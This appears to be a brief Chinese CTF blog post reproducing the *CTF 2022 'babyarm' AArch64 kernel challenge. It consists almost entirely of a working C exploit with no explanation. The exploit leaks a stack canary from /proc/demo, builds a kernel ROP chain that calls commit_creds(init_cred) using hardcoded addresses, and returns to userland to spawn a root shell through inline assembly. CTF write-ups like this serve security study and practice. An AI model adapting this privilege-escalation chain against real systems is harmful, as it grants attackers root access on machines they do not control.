*CTF 2022 babyarm 复现(AArch64 Kernel)
好久不搞CTF
了,最近一直在做IoT
实战,今天抽空复现了一下很久之前的*CTF
里的一道AArch64
架构的内核题,先贴一下exp
,继续咕咕咕了......
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
int fd;
size_t buf[0x500];
size_t kernel_base = 0xffff800008000000, canary;
size_t init_cred = 0xffff800009d2fcc0;
size_t commit_creds = 0xffff8000080a2258;
size_t ret_to_user = 0xffff800008011fb4;
void get_shell()
{
asm(
"mov x0, sp ;"
"mov x2, xzr ;"
"str x2, [sp, #-8]! ;"
"str x0, [sp, #-8]! ;"
"mov x1, sp ;"
"mov x8, #221 ;"
"svc 0 ;"
);
}
int main()
{
fd = open("/proc/demo", O_RDWR);
read(fd, buf, 0x10*8);
canary = buf[12];
memcpy((char *)buf, "/bin/sh\0", 8);
buf[16] = canary;
buf[18] = kernel_base + 0x26d3c;
buf[22] = commit_creds + 4;
buf[28] = init_cred;
buf[32] = kernel_base + 0x17b74;
buf[38] = ret_to_user + 40;
buf[90] = (size_t)buf; // x23 user_sp
buf[91] = (size_t)get_shell; // x21
buf[92] = 0x80001000; // x22
write(fd, buf, 0x300);
return 0;
}